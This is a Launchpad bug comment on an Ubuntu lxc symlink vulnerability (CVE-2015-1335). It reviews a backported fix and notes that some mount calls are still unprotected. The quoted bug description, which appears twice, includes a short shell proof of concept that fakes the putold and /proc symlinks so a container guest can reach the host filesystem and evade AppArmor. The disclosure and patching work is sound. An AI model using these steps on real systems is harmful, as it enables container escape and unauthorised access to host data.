Ubuntu
lxc package

Bug #1476662
Comment #76

Comment 76 for bug 1476662

Revision history for this message

Serge Hallyn (serge-hallyn) wrote on 2015-12-08: Re: [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor

#76

Quoting Mike Gabriel (<email address hidden>):
> Hi all,
>
> today I worked on backporting available fixes for CVE-2015-1335 to LXC
> 0.7.x (as found in Debian squeeze-lts).
>
> The patch is attached, I am still in the testing-for-regressions phase.
> Can any of the LXC devs take a look at the patch and maybe see if it is
> suitable for Ubuntu 12.04, as well?

Hi,

So the thing to look for is any unconverted "mount" calls. It
looks like the lxc_setup_fs() calls to mount_fs() are not being
protected. So the contianer admin could attack through a /proc
symlink.

> Greets,
> Mike (aka sunweaver at debian.org)
>
> ** Patch added: "Backport fix for CVE-2015-1335 to LXC 0.7.x (Ubuntu 12.04 / Debian squeeze-lts)"
> https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+attachment/4529631/+files/CVE-2015-1335.patch
>
> --
> You received this bug notification because you are subscribed to the bug
> report.
> Matching subscriptions: lxc
> https://bugs.launchpad.net/bugs/1476662
>
> Title:
> lxc-start symlink vulnerabilities may allow guest to read host
> filesystem, interfere with apparmor
>
> Status in lxc package in Ubuntu:
> Fix Released
>
> Bug description:
> lxc-start shuffles around mounts using helper directory
> /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here)
>
> It then modifies mounts operating in guest root directory before
> invoking init. As it does not check if all mount points are
> directories, a malicious guest may modify its internal structure
> before shutdown (or was created using manipulated image) and then when
> started again, guest may
>
> * Access the whole host root filesystem
>
> * Block switching from lxc-start apparmor profile to lxc-container-
> default
>
>
> # Real putold before pivot-root (root fs will end here)
> mkdir -p /x/lxc_putold
>
> # Faked putold
> ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold
> mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc
> touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts
>
>
> # proc fake
> mkdir -p /x/proc
> umount /proc
> rmdir /proc
> ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc
>
> mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self
> touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current
> touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status
>
>
> The issue was also found during
> https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html
>
> To manage notifications about this bug go to:
> https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions

Quoting Mike Gabriel (mike.gabriel@das-netzwerkteam.de):
> Hi all,
> 
> today I worked on backporting available fixes for CVE-2015-1335 to LXC
> 0.7.x (as found in Debian squeeze-lts).
> 
> The patch is attached, I am still in the testing-for-regressions phase.
> Can any of the LXC devs take a look at the patch and maybe see if it is
> suitable for Ubuntu 12.04, as well?

Hi,

So the thing to look for is any unconverted "mount" calls.  It
looks like the lxc_setup_fs() calls to mount_fs() are not being
protected.  So the contianer admin could attack through a /proc
symlink.

> Greets,
> Mike (aka sunweaver at debian.org)
> 
> ** Patch added: "Backport fix for CVE-2015-1335 to LXC 0.7.x (Ubuntu 12.04 / Debian squeeze-lts)"
>    https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+attachment/4529631/+files/CVE-2015-1335.patch
> 
> -- 
> You received this bug notification because you are subscribed to the bug
> report.
> Matching subscriptions: lxc
> https://bugs.launchpad.net/bugs/1476662
> 
> Title:
>   lxc-start symlink vulnerabilities may allow guest to read host
>   filesystem, interfere with apparmor
> 
> Status in lxc package in Ubuntu:
>   Fix Released
> 
> Bug description:
>   lxc-start shuffles around mounts using helper directory
>   /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here)
> 
>   It then modifies mounts operating in guest root directory before
>   invoking init. As it does not check if all mount points are
>   directories, a malicious guest may modify its internal structure
>   before shutdown (or was created using manipulated image) and then when
>   started again, guest may
> 
>   * Access  the whole host root filesystem
> 
>   * Block switching from lxc-start apparmor profile to lxc-container-
>   default
> 
>   
>   # Real putold before pivot-root (root fs will end here)
>   mkdir -p /x/lxc_putold
> 
>   # Faked putold
>   ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold
>   mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc
>   touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts
> 
>   
>   # proc fake
>   mkdir -p /x/proc
>   umount /proc
>   rmdir /proc
>   ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc
> 
>   mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self
>   touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current
>   touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status
> 
> 
>   The  issue was also found during
>   https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html
> 
> To manage notifications about this bug go to:
> https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions

Ubuntulxc package

Comment 76 for bug 1476662

Ubuntu
lxc package